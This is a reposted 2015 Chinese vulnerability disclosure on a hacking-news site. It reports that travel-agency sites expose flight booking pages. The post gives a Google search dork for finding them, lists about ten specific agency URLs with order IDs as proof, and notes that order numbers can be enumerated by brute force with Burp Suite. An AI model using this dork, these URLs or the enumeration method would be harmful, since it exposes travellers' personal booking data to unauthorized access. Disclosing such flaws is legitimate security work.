记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

谁泄露了我们的机票信息(旅游业机票信息泄露如此轻而易举)

2015-08-17 11:20

使用谷歌搜索关键词:inurl:FlightOrderDetail.asp

泄露大量机票信息。

谷歌地址:http://www.glgoo.com/search?q=inurl%3AFlightOrderDetail.asp

漏洞证明:

证明1.png

大量机票信息泄露,可直接点开链接访问

http://www.cometours.com/Flight/FlightOrderDetail.asp?OrderID=0031003300300038003100360031003700330039003200360036

证明2.png



http://aifei-air.com/Flight/FlightOrderDetail.asp?OrderID=0031003100300034003000320031003900330039003400330031

证明3.png



http://www.fz1z.com/Flight/FlightOrderDetail.asp?OrderID=0031003100300037003200370032003000310039003200390035

证明4.png



http://www.gyjp.net/Flight/FlightOrderDetail.asp?OrderID=0031003000300035003100380031003300310038003100300038

证明5.png



http://www.gyjp.net/Flight/FlightOrderDetail.asp?OrderID=0031003100300032003100310031003100350031003000330037

证明6.png



http://www.gyjp.net/Flight/FlightOrderDetail.asp?OrderID=0031003300300031003200310031003000350033003300380031

证明7.png



http://www.xa88882222.com/Flight/FlightOrderDetail.asp?OrderID=0031003000300032003200380031003700310030003300320034

证明8.png



http://lvyouoo.com/Flight/FlightOrderDetail.asp?OrderID=0031003100300037003200320032003200340034003000390035

证明9.png



http://51lehang.com/Flight/FlightOrderDetail.asp?OrderID=0031003400300039003000320031003000320031003400380034

证明10.png



http://www.88888082.com/Flight/FlightOrderDetail.asp?OrderID=0031003400300033003000370031003500330030003500340031

证明11.png



还有很多。这里说一下,订单号可以用burpsuite爆破遍历。

修复方案:

知识来源: www.wooyun.org/bugs/wooyun-2015-0123153

阅读:69199 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“谁泄露了我们的机票信息(旅游业机票信息泄露如此轻而易举)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云